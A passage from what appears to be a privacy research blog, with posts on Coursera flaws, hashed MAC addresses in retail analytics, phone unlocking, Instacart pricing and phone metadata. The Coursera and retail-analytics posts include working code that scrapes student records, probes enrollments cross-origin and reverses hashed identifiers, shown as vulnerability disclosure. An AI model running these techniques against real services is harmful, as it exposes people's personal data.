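            if (data.length > 0) users.push(data[0]);
        } catch (e) {
            // Skip IDs whose responses are not valid JSON.
        }
    };
    // The third argument (false) makes the request synchronous, so each
    // response is handled before the next ID is requested.
    req.open("get", "https://www.coursera.org/maestro/api/admin/search?id=" + i, false);
    req.send();
}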

Yes, it works.

I reported this issue to Coursera last Thursday; to the company’s credit, in less than a day API responses were reduced to 10 records (down from 200) and email queries required 5 characters (up from 2). Rate limits—the most important defense, if Coursera retains this autocomplete feature—will also be enabled soon. So, the good news is that dumping the entire student database will become much more difficult.

The bad news is that anyone with teacher access can still look up any individual student’s contact information, so long as he or she either knows the student’s internal ID (it’s embedded in many pages) or can guess a distinctive part of the student’s email address (maybe try first initial last name?). That’s a questionable security model, and it’s potentially inconsistent with Coursera’s privacy policy.¹

2. Listing a Student’s Course Enrollments

Educational choices can be very revealing. A quick skim of Coursera’s catalog, for instance, turns up offerings related to medical conditions and religious beliefs. The notion that course enrollments should be (optionally) private is certainly not new—for over forty years, federal law has limited when academic institutions can share student records.²

While fiddling with Coursera’s APIs, I spotted a cross-origin information leak that could be used to list a student’s course enrollments. The idea is that certain endpoints respond to user permission problems with an HTTP error status. Another website could trivially trigger a request to those endpoints and check the response status.

Consider the user ID endpoint at

https://api.coursera.org/utilities/v1/whoami

If a user is not logged in, the response reads like

{"message":"unauthorized"}

with a 401 Unauthorized status. By contrast, if the user is logged in, the response is like

{"userId":"544426","partnerId":"None","isCoursera":"true"}

with a 200 OK status. It’s easy for another website to determine whether a user is logged in: it can trigger a request to the endpoint and check whether the request succeeds or fails.
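A rough sketch of one way such a check could be written follows. It assumes the browser fires a load event on a script element when the response status is a success and an error event when it is something like 401. That was the general behavior of browsers at the time, and current browsers may block or treat these requests differently. The helper name and its parameters are hypothetical.

```javascript
// Hypothetical helper: request a cross-origin URL through a <script>
// element and report which event fired. `doc` is the page's document
// object, passed in so the function has no hidden dependencies.
function probeEndpoint(doc, url, callback) {
    const script = doc.createElement("script");
    // Assumed: load fires for a successful (2xx) response.
    script.onload = function() { callback(true); };
    // Assumed: error fires for a failure status such as 401.
    script.onerror = function() { callback(false); };
    script.src = url;
    doc.head.appendChild(script);
}

// In a browser, a third-party page could call:
// probeEndpoint(document, "https://api.coursera.org/utilities/v1/whoami",
//     function(loggedIn) { console.log("Logged in?", loggedIn); });
```

The response body is never readable by the other website. The only signal is which of the two events fires, and that is enough.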

The very same approach works for listing a student’s courses. The endpoint at

https://api.coursera.org/api/sessions/v1/COURSE_ID/sections/1/items

returns materials for the first section of a course. If a student is enrolled, 200 OK; if not, 401 Unauthorized.

Developing a proof-of-concept was straightforward. If you’d like to see the issue in action, log into your Coursera account and visit this test page. With near-zero effort at optimization, the page gathers your course enrollments in under a minute.

I reported the issue to Coursera on Sunday, and I have not yet received a response. Possible remediation steps include rate limiting (again), referrer checking, and configuring APIs to always return the same HTTP status.

3. Undoing User ID Privacy Protection

Every user in Coursera’s system has two separate identifiers: a sequential “internal” ID, and a gibberish-looking “external” ID. My internal ID, for example, is 544426 and my external ID is fe7e73fef0333f550378979caa1d3347.

The reason for maintaining two identifiers is, supposedly, account security and privacy. A public resource, such as a user profile page, references just the external ID.

https://www.coursera.org/user/i/fe7e73fef0333f550378979caa1d3347

It is difficult to discern what, exactly, the dual ID scheme is supposed to accomplish. So long as a user’s profile is accessible, one API endpoint at

https://www.coursera.org/maestro/api/user/profiles

maps the internal ID to the external ID.

[{
    ...
    "external_id": "fe7e73fef0333f550378979caa1d3347"
}]

Another API endpoint, at

https://www.coursera.org/maestro/api/user/profile

maps the external ID to the internal ID.

{
    ...
    "id": 544426,
    ...
}

It’s trivial to undo any (mysterious) security or privacy gain so long as these APIs are available. It’s also trivial to build a dictionary of internal and external IDs.

What’s more, most external IDs aren’t actually gibberish. They appear to fall into three sets:

For users with internal IDs roughly between 0 and 1.15M, the external ID is simply an MD5 hash of some (relatively) small number. My external ID, for example, is the hash of 315368.
For users with internal IDs roughly between 1.15M and 7M, the external ID is merely an MD5 hash of the internal ID.
For users with internal IDs of 7M or above, the external ID is not super-obviously reversible.

The punchline is that, for the majority of Coursera users, no API is even needed to flip between external and internal IDs. If you’re curious about your own external ID, you can grab it from your Coursera profile URL and pop it into a free MD5 reversal website.
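For the curious, reversing a hash of a small number takes only a short loop. This is a sketch under one assumption of mine: that the hashed value is the number written as a plain decimal string. The function names are made up for illustration.

```javascript
const crypto = require("crypto");

// MD5 of a string, as lowercase hex.
function md5Hex(text) {
    return crypto.createHash("md5").update(text).digest("hex");
}

// Try every integer from 0 through maxId and return the one whose MD5
// hash (of its decimal string, an assumption) equals externalId.
// Returns null if nothing in the range matches.
function reverseExternalId(externalId, maxId) {
    for (let n = 0; n <= maxId; n++) {
        if (md5Hex(String(n)) === externalId) return n;
    }
    return null;
}

// Round trip on a value generated here, not a real user's ID.
const sample = md5Hex("4242");
console.log(reverseExternalId(sample, 10000)); // 4242
```

A few million MD5 computations finish in seconds on ordinary hardware, which is why hashing a small sequential number offers so little protection.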

I notified Coursera of this issue last Thursday. Apparently external IDs for new users haven’t been generated with MD5 for about a year. That prospectively solves one aspect of the problem—but it doesn’t address older (i.e. most) users or the mapping APIs.

Most importantly, it doesn’t explain what these external IDs are supposed to achieve. Even if there were no simple APIs for mapping IDs, and even if external IDs weren’t easily reversible (e.g. a salted hash or HMAC), what is the precise security or privacy benefit?

1. Coursera’s privacy policy lists circumstances in which a student’s contact information might be shared with an academic institution, including when a student has enrolled in one of the institution’s courses and for marketing purposes. Those caveats would not seem to cover making every student’s information available to every teacher.

2. Coursera and partner institutions have taken the position that offerings on the platform are not covered by the Family Educational Rights and Privacy Act (FERPA). Online courses do not have “students,” they have “participants.”

Mobile Phone Unlocking, Now Less Illegal?

jonathan — Mon, 04 Aug 2014 18:15:00 +0000

On Friday, President Obama signed a mobile phone unlocking bill into law. Some observers have taken to describing S. 517, the Unlocking Consumer Choice and Wireless Competition Act, as a permission slip for consumers. Here’s a sample:

The New York Times: “you will no longer be breaking the law if you unlock your cellphone”
The Los Angeles Times: “makes it legal once again for consumers to unlock their cellphones”
CNET: “makes unlocking a cell phone legal again”

Those explanations aren’t quite accurate. The new law (temporarily) shields consumers from the Digital Millennium Copyright Act. It is, by design, a narrow fix; it expressly leaves other sources of legal liability untouched.

“. . . nothing in this Act shall be construed to alter the scope of any party’s rights under existing law.”

Contract law certainly still applies. If you have agreed with your carrier that you will not unlock your phone, that promise remains legally binding and enforceable. Here’s what the AT&T service contract says, for example:

You agree that you won’t make any modifications to your Equipment or its programming to enable the Equipment to operate on any other system.

Computer abuse law is another potential source of liability. Wireless services have previously targeted mobile phone resellers with federal and state anti-hacking statutes. In 2012 alone, cell carriers filed over a dozen Computer Fraud and Abuse Act unlocking lawsuits.

So, what exactly has changed? Last week’s law is unambiguously a big political win for consumers. The winds have plainly shifted towards greater control over personal devices.

Last week’s law is, however, only a partial legal win for consumers. There remain civil and criminal legal risks associated with unauthorized cell phone unlocking.

Disclaimer: I am not your lawyer, and this is not legal advice.

Is Instacart Deceptive?

jonathan — Tue, 08 Jul 2014 19:01:54 +0000

A few weeks ago, a Stanford colleague stormed into my office. He had ordered some groceries from Instacart, a buzzy get-it-now startup that recently raised $44 million. My friend thought he had paid a flat $3.99 for delivery from a local store. In fact, he had paid about $20 net of store prices. How, he fumed, could this be legal? From a quick Googling, he isn’t the only one steamed about Instacart’s subtle surcharge.

Measuring the Markup
In an attempt to estimate the Instacart commission, I picked four stores: Safeway and Costco in San Francisco, and The Food Emporium and Costco in New York City. I built a basket of goods for each store, using what was “Popular” on Instacart. Finally, I compared Instacart’s prices with store prices.¹ All of my data is available on a spreadsheet. The following histograms reflect relative price differences.²

A few results are apparent. First, Instacart unambiguously charges a premium. As a rule of thumb, the markup is 20%. This finding is roughly consistent with previous informal estimates. Here’s an example, to illustrate the effect: an order that appears to be $50 of groceries with a $3.99 flat delivery fee is, in fact, about $41.67 of groceries and $12.32 in delivery expense. Yikes.

Second, Instacart’s premium is not specific to a geographic market. Both San Francisco and New York City exhibit increased pricing. The legal implication is that Instacart’s business model must pass muster with multiple states’ consumer protection laws.

Third, the distribution of the markup varies from store to store. I could only speculate as to why.³

Fourth, there are substantial outliers in both directions. Instacart did have a few steals, such as nearly-half-off avocados at Safeway and The Food Emporium. It also had some astonishingly awful deals, though, such as 86% inflated Simply Orange juice at Safeway and 70% marked up cans of Coke at The Food Emporium.
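To make the arithmetic behind the $50 example explicit, here is a small sketch. It assumes a uniform 20% markup on every item, which is only my rule of thumb from the data, and the function name is made up.

```javascript
// Split a listed order total into in-store grocery cost and the true
// delivery expense (hidden markup plus the flat fee).
function splitOrder(listedTotal, markupRate, flatFee) {
    const storePrice = listedTotal / (1 + markupRate);
    const hiddenMarkup = listedTotal - storePrice;
    return {
        groceries: storePrice,
        delivery: hiddenMarkup + flatFee
    };
}

const order = splitOrder(50, 0.20, 3.99);
console.log(order.groceries.toFixed(2)); // 41.67
console.log(order.delivery.toFixed(2));  // 12.32
```

Note that the markup is computed against the store price, not the listed price, which is why $50 of listed groceries corresponds to $41.67 in the store rather than $40.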

I also noticed that Instacart’s “Extraordinary Value” notation has questionable meaning. For example, Instacart featured a bottle of Domaine Chandon Brut for $16.09 from Safeway. The very same sparkling wine was 10¢ less at Safeway and competing local stores. Not much extraordinary about that value.

So, is all this legal? Consumer protection law involves a fact-intensive inquiry into how ordinary consumers perceive a business, and whether they would be misled.⁴

In Defense of Instacart
There are a couple of good facts for Instacart. The service does have a disclosure.⁵

Are your prices different from the store?
Yes, Instacart prices are our own and vary from the store’s price…

The legal effect of this passage is debatable, though. A shopper would have to navigate to the FAQ and scroll down to find it. Furthermore, the text notes only that Instacart’s prices are different—not that they are higher, and not how much higher.

Instacart also benefits from some news coverage and online discussion, which have explained that the service relies on a markup. For those paying particularly close attention, the contours of the business model are plainly not a secret.

The Case Against Instacart
There are, on the other hand, a number of bad facts. The worst, perhaps, are Instacart’s own pricing explanations. Representatives have variously claimed that the markup is “nominal,” just a “touch” higher than in-store pricing, “slightly different than what is in stores,” and “a little different than what you would see at the grocery store.” Good luck squaring that with a 20% commission.

What’s more, some of Instacart’s descriptions create a predictable false equivalence, such as “prices are a bit higher or a bit lower” and “our prices are lower or higher than the stores’ prices, sometimes they are the same.” Yes, all these price relationships are possible, but they hardly occur with equal probability. An earlier version of the Instacart FAQ included similar language but, tellingly, the text was removed.

Assuming it is authentic, a 2013 pitch deck that I stumbled across is also problematic.

When explaining its business model to investors, Instacart puts the markup front and center. When dealing with shoppers, Instacart buries the lede. Differential messaging sure looks bad under consumer protection law, and the deck suggests more might come out in discovery.

Instacart’s pricing structure may also contribute to consumer confusion. The service promotes “free” delivery for new customers and flat delivery fees for repeat shoppers. When explaining “delivery cost,” the FAQ nowhere suggests that product prices are a factor. A customer could trivially assume that listed fees are the sole or primary source of delivery expense.

The Instacart experience is another knock, since it is designed to mimic shopping at your local store. A user begins by selecting a grocer, then navigates by department. After the user places an order, contractors actually go to the store and make the purchase. It is easy to see how a shopper might erroneously assume that Instacart charges roughly in-store prices.

Instacart’s alcohol pricing FAQ highlights the firm’s tenuous position.

Are your alcohol prices different from the store?
No, but we add a delivery fee to the store’s price for each item you purchase. This is why the prices listed on our website appear to be higher than those charged in the store.

Apparently a surcharge on booze is a “delivery fee,” while a markup on everything else is a “vary[ing]” price. The purpose of this passage is, presumably, to sidestep alcohol sales law. In the process, though, it emphasizes how an inflated price is functionally equivalent to a delivery fee.

Instacart’s peers pose a final problem. Many of the latest crop of same-day delivery services rely on transparent fees, including Postmates, TaskRabbit, Google Shopping Express, and eBay Now.⁶ These offerings function like flat-rate courier services, not a corner convenience store. Since Instacart’s competitors don’t include a markup, consumers might not expect it.

Concluding Thoughts
Instacart operates in a gray area. The business model is certainly close to the legal line; which side it falls on, I can’t say.⁷ I informally polled a group of lawyer friends for their views, and all agreed that Instacart had substantial exposure to law enforcement and private litigation risks. (I wonder if investors were aware.)

Setting aside the law, Instacart’s business model is quite unsavory. Instacart is plainly designed with the intent and effect of hiding the true cost of grocery delivery. Uncool.

The possible fixes are obvious and easy: Wherever the service discusses its delivery fees, for example, it could also note its approximate markup. Alternatively, it could note the expected premium next to prices, in the shopping cart, or on the checkout page.

I am all in favor of “disrupting” the grocery store. Just not by misleading shoppers.

Usual disclaimer: I am a lawyer, but this is not legal advice.

1. This methodology may introduce a slight bias in Instacart’s favor, since shoppers who recognize the surcharge may select better values.

Prices for Safeway and The Food Emporium are taken directly from those stores’ websites. The pricing includes available discounts. (In my experience, it’s not even necessary to have a card at these stores—politely asking a cashier is sufficient.) Prices for Costco are from Google Shopping Express, which appears to reflect in-store pricing. (Costco has an online business delivery service, but it seems to have different prices.)

I assume that Instacart separately charges applicable taxes, since that has been my experience using the site. To the extent Instacart’s prices include taxes, the surcharges reported here should be discounted that much. They would still be substantial.

2. I also generated the following histograms of absolute price differences.

These distributions are generally less concentrated than the distributions for relative price differential, so I focus the discussion there.

3. I imagine factors include Safeway’s notoriously fickle discounting, the frequency with which specific items are ordered from specific stores, and amortization of the Costco membership fee.

4. For simplicity, I lump together the usual consumer protection causes of action (including unfair business practices, deceptive business practices, false advertising, and common law fraud). The specifics of these claims differ, to be sure, and vary by jurisdiction. For purposes of Instacart, though, the causes largely reduce to the same factual issue.

5. The Instacart “Terms and Conditions” also include this passage.

The additional fee Customer pays that is above the retail price of the Groceries is for the purpose of engaging the Personal Shopper to perform the Personal Shopper Services.

Read in context, this passage is an explanation of the customer’s business relationship with Instacart and its independent contractors. The provision explains why fees are charged, not how fees are charged. A flat delivery fee would also be within the meaning of this text—and has to be, since the document nowhere else addresses payment for grocery delivery.

6. At least one other get-it-now startup, DoorDash, uses inflated prices. The specifics of the business model differ (restaurants choose whether and how much to increase prices, not the delivery service), and there is clearer disclosure in the website’s FAQ.

7. The closest analogy that comes to mind—and it’s hardly a perfect fit—is litigation over inflated currency exchange rates. Courts have squarely split on the issue.

Questionable Crypto in Retail Analytics

jonathan — Wed, 19 Mar 2014 13:39:22 +0000

Retail analytics is a fraught field. The premise is straightforward: enable brick-and-mortar stores to track their customers. The technology is straightforward, too: monitor broadcasts from shoppers’ smartphones. Privacy concerns have, however, put a damper on the nascent industry. Regulators, legislators, and advocacy groups have questioned the legitimacy of surreptitiously monitoring shoppers’ gadgets.

Last fall, Senator Schumer announced a grand bargain with retail analytics firms. They will be bound by a “Mobile Location Analytics Code of Conduct,” a set of voluntary practices intended to assuage privacy fears. The document has already been widely panned, both as a product of backroom dealing, and for providing little substantive protection to consumers.

One particular point of contention is how the industry proposes to preserve privacy through cryptography. This post explains the Code of Conduct’s crypto, and demonstrates how it can trivially be undone.

A brief explanation of retail analytics sets the stage. Your smartphone includes WiFi and Bluetooth chips, and those chips each have a unique serial number, called a MAC address. Periodically your phone will announce itself, including those MAC addresses. The most common approach to retail analytics simply logs these broadcasts and compiles a shopper’s activity. A retail analytics firm might, for example, build a database like this.

MAC Address	Locations
aa:bb:cc:dd:ee:ff	Gap, Chicago, Tuesday at 10am; Apple Store, San Francisco, Thursday at 1pm; AT&T Park, San Francisco, Thursday at 8pm
11:22:33:44:55:66	Nordstrom, New York, Sunday at 7pm

As a concession to privacy concerns, the Code of Conduct calls for a math fix. Before a MAC address is saved, it gets passed through a cryptographic hash function. The idea, without going into detail, is to produce a random-looking number from each MAC address. The result is a database like this.¹

Hashed MAC Address	Locations
317060aa70a5a9e846…	Gap, Chicago, Tuesday at 10am; Apple Store, San Francisco, Thursday at 1pm; AT&T Park, San Francisco, Thursday at 8pm
5c6a981c81b9fcb030…	Nordstrom, New York, Sunday at 7pm

It’s far from clear that hashing actually solves privacy problems here. If someone wants to learn the shopping history associated with a particular MAC address, they can simply apply the hash function, then look up the hash in the database.

$ echo -n "aa:bb:cc:dd:ee:ff" | openssl sha1
317060aa70a5a9e846...
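
The same lookup can be sketched in a few lines of Python. This is only an illustration: it assumes SHA-1 over the lowercase, colon-separated address string, and the `database` dictionary and `lookup` helper are hypothetical stand-ins for whatever store a retail analytics firm actually uses.

```python
import hashlib


def hash_mac(mac: str) -> str:
    """Return the hex SHA-1 digest of a MAC address string."""
    return hashlib.sha1(mac.encode("ascii")).hexdigest()


# Hypothetical database keyed by hashed MAC address, mirroring the table above.
database = {
    hash_mac("aa:bb:cc:dd:ee:ff"): [
        "Gap, Chicago, Tuesday at 10am",
        "Apple Store, San Francisco, Thursday at 1pm",
        "AT&T Park, San Francisco, Thursday at 8pm",
    ],
    hash_mac("11:22:33:44:55:66"): ["Nordstrom, New York, Sunday at 7pm"],
}


def lookup(mac: str) -> list:
    """Anyone who knows a MAC address can re-hash it and read the history."""
    return database.get(hash_mac(mac), [])


print(lookup("aa:bb:cc:dd:ee:ff"))
```

The hash hides nothing from someone who already holds the MAC address, because the function is public and deterministic.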

Hashing is also no defense against re-identification. For example, if you know Alice went to Gap in Chicago on Tuesday morning, and the Apple Store in San Francisco on Thursday afternoon, it’s trivial to identify Alice’s smartphone in the database.

Hashed MAC Address	Locations
317060aa70a5a9e846…	Gap, Chicago, Tuesday at 10am; Apple Store, San Francisco, Thursday at 1pm; AT&T Park, San Francisco, Thursday at 8pm

There’s yet another problem here. The very purpose of this crypto is to prevent reversing a hash back into an unknown MAC address. Euclid, one of the better-known retail analytics firms, claims:

Hashed data cannot be reverse-engineered by a third party to reveal a device’s MAC address. This means that anyone who gains access to the database . . . would see only long strings of numbers and letters. They would be unable to get any information that could be linked to a back to a particular mobile device owner.

Challenge accepted. In under an hour, and for less than a dollar, I built a cloud system that reverses hashed MAC addresses.²

Some back of the envelope math suggested the task was doable. There are 6 bytes in a MAC address; the first 3 bytes are allocated to the network device vendor, and the last 3 bytes are chosen by the vendor. In total, then, there are 2⁴⁸ possible MAC addresses. Since only 19,130 vendor prefixes have been actually allocated for use, however, there are at most 2^38.22 validly assigned MAC addresses. That number might sound big, but modern consumer hardware can calculate roughly 2³⁰ hashes per second. In other words, it should be possible to check every validly assigned MAC address in just a few minutes.
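
For readers who want to check the arithmetic, here is the estimate as a short Python calculation. The inputs are the figures quoted above (19,130 allocated prefixes, 3 vendor-chosen bytes, roughly 2³⁰ hashes per second); the variable names are mine.

```python
import math

VENDOR_PREFIXES = 19_130       # allocated vendor prefixes, per the text
SUFFIXES_PER_PREFIX = 2 ** 24  # 3 vendor-chosen bytes
HASHES_PER_SECOND = 2 ** 30    # rough consumer-hardware rate, per the text

keyspace = VENDOR_PREFIXES * SUFFIXES_PER_PREFIX
keyspace_bits = math.log2(keyspace)
seconds = keyspace / HASHES_PER_SECOND

print(f"{keyspace:,} addresses (2^{keyspace_bits:.2f})")
print(f"about {seconds / 60:.1f} minutes to hash them all")
```

At that rate the full sweep takes about five minutes.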

Since I had just a puny notebook on hand, I rented a server with a graphics card in Amazon’s cloud. (Hashing involves parallelized math, so a graphics card gives a substantial performance boost.) Next, I installed oclHashcat, a fast hash-checking program. Writing format files for hashcat took just a few minutes.³ (They’re available on GitHub for the curious.) Then, with no effort at optimization, I tossed in the hash of my smartphone’s MAC address. Reversing the hash took just 12 minutes. Total cost: $0.65, plus tax.
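
To make the attack concrete, here is a CPU-only Python sketch of the same search. It is not the oclHashcat setup described above, and it is far slower. It assumes the lowercase, separator-free format noted in footnote 3. The prefixes, the target address, and the `reverse_hash` helper are hypothetical, and the demo shrinks the suffix space so it finishes in well under a second.

```python
import hashlib
from typing import Iterable, Optional


def sha1_hex(text: str) -> str:
    """Hex SHA-1 digest of an ASCII string."""
    return hashlib.sha1(text.encode("ascii")).hexdigest()


def reverse_hash(target: str, prefixes: Iterable[str],
                 suffix_space: int = 2 ** 24) -> Optional[str]:
    """Hash every suffix under each vendor prefix until one matches target."""
    for prefix in prefixes:
        for suffix in range(suffix_space):
            candidate = f"{prefix}{suffix:06x}"  # 6 hex digits = 3 bytes
            if sha1_hex(candidate) == target:
                return candidate
    return None


# Hypothetical vendor prefixes and a hypothetical "unknown" address.
demo_prefixes = ["aabbcc", "112233"]
secret_mac = "11223300beef"

# The demo searches only 2^16 suffixes per prefix to stay quick.
recovered = reverse_hash(sha1_hex(secret_mac), demo_prefixes, suffix_space=2 ** 16)
print(recovered)
```

A real run would loop over every allocated prefix and the full 2²⁴ suffixes, which is the workload a graphics card handles in minutes.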

There’s plenty of room for improvement. A more sophisticated approach would be to prioritize MAC prefixes associated with smartphone vendors. It’s also trivial to compute hashes for all the valid MAC addresses and save them for quick lookup; a few consumer hard drives would provide sufficient storage.⁴

Before closing, let me add a quick note about salted hashing and hash-based message authentication codes (HMAC). Those techniques integrate extra information in the course of hashing, frustrating attacks that rely on precomputed hash values. They do not, however, protect against attacks that involve actually computing hashes. If an employee or intruder has access to hashed MAC addresses, they presumptively also have access to the extra information. Salting and HMAC are no solution here.
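
A short Python sketch shows why. It assumes HMAC-SHA1 with a single secret key, and the key, prefix, and address are all hypothetical. Once the key is known, the search is the same loop as for a plain hash.

```python
import hashlib
import hmac
from typing import Optional


def keyed_hash(key: bytes, mac: str) -> str:
    """HMAC-SHA1 of a MAC address string under the given key."""
    return hmac.new(key, mac.encode("ascii"), hashlib.sha1).hexdigest()


def reverse_keyed_hash(target: str, key: bytes, prefix: str,
                       suffix_space: int = 2 ** 24) -> Optional[str]:
    """Brute-force one vendor prefix, recomputing the HMAC for each candidate."""
    for suffix in range(suffix_space):
        candidate = f"{prefix}{suffix:06x}"
        if hmac.compare_digest(keyed_hash(key, candidate), target):
            return candidate
    return None


# Hypothetical key, assumed to be stored alongside the hashed addresses.
key = b"hypothetical-secret"
stored = keyed_hash(key, "aabbcc001234")

# Small suffix space so the demo runs quickly.
recovered = reverse_keyed_hash(stored, key, "aabbcc", suffix_space=2 ** 16)
print(recovered)
```

The key defeats a precomputed table built without it, but it costs an insider or intruder who holds the key only a constant factor per guess.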

The problem underlying all this is a flawed assumption within the Code of Conduct. In cringe-inducing legalese, that document presumes retail analytics data can be simultaneously:

“associated with a particular . . . device,” and
not “reasonably . . . linked to an individual,” including their MAC address.

There is no such class of data, so long as retail analytics free-rides on smartphone WiFi and Bluetooth.⁵ Hashing is not a silver bullet for electronic privacy. As we have seen, it is possible to test retail analytics data against every possible device. If data is associated with a particular device, it is always linkable back to an individual.

1. Throughout this post, I use the SHA-1 cryptographic hash function. My understanding is that several retail analytics firms have deployed it in their products. The same analysis would apply for a different hash function, just with different output values, performance, and memory requirements.

2. After drafting this post, I came across a master’s degree research paper at INRIA on WiFi tracking and privacy. The author also concludes that reversing hashed MAC addresses is easy, and “hashing a MAC address is not a satisfactory solution” for location privacy.

3. I formatted MAC addresses in lowercase, without byte separators. It would be trivial to use a different format, or even multiple formats.

4. A naïve approach would be to store each valid MAC address and its SHA-1 hash in a database. Since each MAC address is 6 bytes, and each SHA-1 hash is 20 bytes, the pair is 26 bytes. There are 2^38.22 valid MAC addresses, as discussed above. The entire set is therefore 26 · 2^38.22 bytes ≈ 8.3 TB.

5. If shoppers ran store software on their smartphones, there would be viable privacy-preserving approaches to retail analytics. The appeal of WiFi and Bluetooth, of course, is that shoppers are automatically included.

MetaPhone: The Sensitivity of Telephone Metadata

jonathan — Wed, 12 Mar 2014 14:45:04 +0000

Co-authored with Patrick Mutchler.

Is telephone metadata sensitive? The debate has taken on new urgency since last summer’s NSA revelations; all three branches of the federal government are now considering curbs on access. Consumer privacy concerns are also salient, as the FCC assesses telecom data sharing practices.

President Obama has emphasized that the NSA is “not looking at content.” “[T]his is just metadata,” Senator Feinstein told reporters. In dismissing the ACLU’s legal challenge, Judge Pauley shrugged off possible sensitive inferences as a “parade of horribles.”

On the other side, a number of computer scientists have expressed concern over the privacy risks posed by metadata. Ed Felten gave a particularly detailed explanation in a declaration for the ACLU: “Telephony metadata can be extremely revealing,” he wrote, “both at the level of individual calls and, especially, in the aggregate.” Holding the NSA’s program likely unconstitutional, Judge Leon credited this view and noted that “metadata from each person’s phone ‘reflects a wealth of detail about her familial, political, professional, religious, and sexual associations.’”

This is, at base, a factual dispute. Is it easy to draw sensitive inferences from phone metadata? How often do people conduct sensitive matters by phone, in a manner reflected by metadata?

We used crowdsourced data to arrive at empirical answers. Since November, we have been conducting a study of phone metadata privacy. Participants run the MetaPhone app on their Android smartphone; it submits device logs and social network information for analysis. In previous posts, we have used the MetaPhone dataset to spot relationships, understand call graph interconnectivity, and estimate the identifiability of phone numbers.

At the outset of this study, we shared the same hypothesis as our computer science colleagues—we thought phone metadata could be very sensitive. We did not anticipate finding much evidence one way or the other, however, since the MetaPhone participant population is small and participants only provide a few months of phone activity on average.

We were wrong. We found that phone metadata is unambiguously sensitive, even in a small population and over a short time window. We were able to infer medical conditions, firearm ownership, and more, using solely phone metadata.

Methodology

We began by identifying the MetaPhone participants’ contacts. We used the same approach as in our prior work on number identifiability, matching phone numbers against the public Yelp and Google Places directories. In total, our 546 participants contacted 33,688 unique numbers. 6,107 of those numbers (18%) resolved to an identity.

Next, we labeled the contacts that appeared related to a sensitive activity or trait. In most instances, an organization’s line of business was apparent from its name. Where there was ambiguity, we used simple Google queries to learn more.

We present two sets of results. First, we provide an analysis of individual calls to sensitive numbers. Second, we relate several patterns of calls to emphasize the detail available in telephone metadata.

Individual Call Results

Many organizations have a narrow purpose, such that an individual call gives rise to sensitive inferences. If a person reaches out to a political campaign, for example, it seems highly probable that the person supports the candidate. Similarly, if a person speaks at length with a religious institution, it appears likely that the person is of that faith. A further inference could also be made, that the person worships at that particular institution.

We found numerous calls within our dataset that give rise to these sorts of straightforward inferences. The following table presents the proportion of participants who had at least one call with each category of sensitive organization.

Category	Participants with ≥ 1 Calls
Health Services	57%
Financial Services	40%
Pharmacies	30%
Veterinary Services	18%
Legal Services	10%
Recruiting and Job Placement	10%
Religious Organizations	8%
Firearm Sales and Repair	7%
Political Officeholders and Campaigns	4%
Adult Establishments	2%
Marijuana Dispensaries	0.4%

The case of religious organizations gave us an opportunity to check the precision of our inferences. Since the MetaPhone app collects a user’s religion from his or her Facebook profile, we could compare phone metadata inferences against ground truth. There were 15 participants with both a well-defined religious status on Facebook (including atheism) and phone contact with a religious organization. Using just the naïve assumption that a person’s most-called religion is their own religion, we accurately identified the religious status of 11 of the 15 (73%).
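
The naïve rule is simple enough to sketch in Python. The call logs and ground-truth labels below are made up for illustration and are not MetaPhone data; `infer_religion` and `precision` are hypothetical helper names.

```python
from collections import Counter


def infer_religion(calls):
    """Guess a religion as the most frequently called one (None if no calls)."""
    counts = Counter(calls)
    if not counts:
        return None
    return counts.most_common(1)[0][0]


def precision(predictions, truth):
    """Fraction of predictions that match the known ground-truth label."""
    scored = [(guess, truth[user]) for user, guess in predictions.items()
              if user in truth]
    return sum(guess == actual for guess, actual in scored) / len(scored)


# Hypothetical data: one religion label per call to a religious organization.
call_logs = {
    "u1": ["Catholic", "Catholic", "Baptist"],
    "u2": ["Jewish"],
    "u3": ["Baptist", "Catholic", "Baptist"],
}
ground_truth = {"u1": "Catholic", "u2": "Jewish", "u3": "Catholic"}

predictions = {user: infer_religion(calls) for user, calls in call_logs.items()}
print(predictions, precision(predictions, ground_truth))
```

In this toy data the rule gets two of three users right; the third calls another faith's institution more often than their own.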

Many numbers were associated with specialized products or services, particularly within professional fields. In medicine, for example, we were able to easily categorize phone numbers by specialty practice area.

Category	Participants with ≥ 1 Calls
Dentistry and Oral Health	18%
Mental Health and Family Services	8%
Ophthalmology and Optometry	6%
Sexual and Reproductive Health	6%
Pediatrics	5%
Orthopedics	4%
Chiropractic Care	3%
Rehabilitation and Physical Therapy	3%
Medical Laboratories	2%
Emergency or Urgent Care	2%
Cardiology	2%
Dermatology	1%
Ear, Nose, and Throat	1%
Neurology	1%
Oncology	1%
Substance Abuse	1%
Cosmetic Surgery	1%

The degree of sensitivity among contacts took us aback. Participants had calls with Alcoholics Anonymous, gun stores, NARAL Pro-Choice, labor unions, divorce lawyers, sexually transmitted disease clinics, a Canadian import pharmacy, strip clubs, and much more. This was not a hypothetical parade of horribles. These were simple inferences, about real phone users, that could trivially be made on a large scale.

Pattern Results

A pattern of calls will often, of course, reveal more than individual call records. During our analysis, we encountered a number of patterns that were highly indicative of sensitive activities or traits. The following examples are drawn directly from our dataset, using number identification through public resources. Though most MetaPhone participants consented to having their identity disclosed, we use pseudonyms in this report to protect participant privacy.

Participant A communicated with multiple local neurology groups, a specialty pharmacy, a rare condition management service, and a hotline for a pharmaceutical used solely to treat relapsing multiple sclerosis.
Participant B spoke at length with cardiologists at a major medical center, talked briefly with a medical laboratory, received calls from a pharmacy, and placed short calls to a home reporting hotline for a medical device used to monitor cardiac arrhythmia.
Participant C made a number of calls to a firearm store that specializes in the AR semiautomatic rifle platform. They also spoke at length with customer service for a firearm manufacturer that produces an AR line.
In a span of three weeks, Participant D contacted a home improvement store, locksmiths, a hydroponics dealer, and a head shop.
Participant E had a long, early morning call with her sister. Two days later, she placed a series of calls to the local Planned Parenthood location. She placed brief additional calls two weeks later, and made a final call a month after.

We were able to corroborate Participant B’s medical condition and Participant C’s firearm ownership using public information sources. Owing to the sensitivity of these matters, we elected to not contact Participants A, D, or E for confirmation.

Conclusion

The dataset that we analyzed in this report spanned hundreds of users over several months. Phone records held by the NSA and telecoms span millions of Americans over multiple years. Reasonable minds can disagree about the policy and legal constraints that should be imposed on those databases. The science, however, is clear: phone metadata is highly sensitive.

Advancing Empirical Legal Scholarship: State Materials

jonathan — Sun, 29 Dec 2013 22:19:11 +0000

Over the past year, I have shared various federal primary legal materials formatted in XML. The project’s focus has been enabling empirical legal scholarship with machine-readable government documents.

This final post is accompanied by state materials, including statutes, court opinions, regulations, and administrative rulings. I continue to welcome feedback from fellow researchers.

Update January 13, 2014: The data is now hosted on Amazon S3 in a requester pays bucket. If you have not properly configured your request, you will receive an “Access Denied” error.

Alabama: ZIP (484 MB)
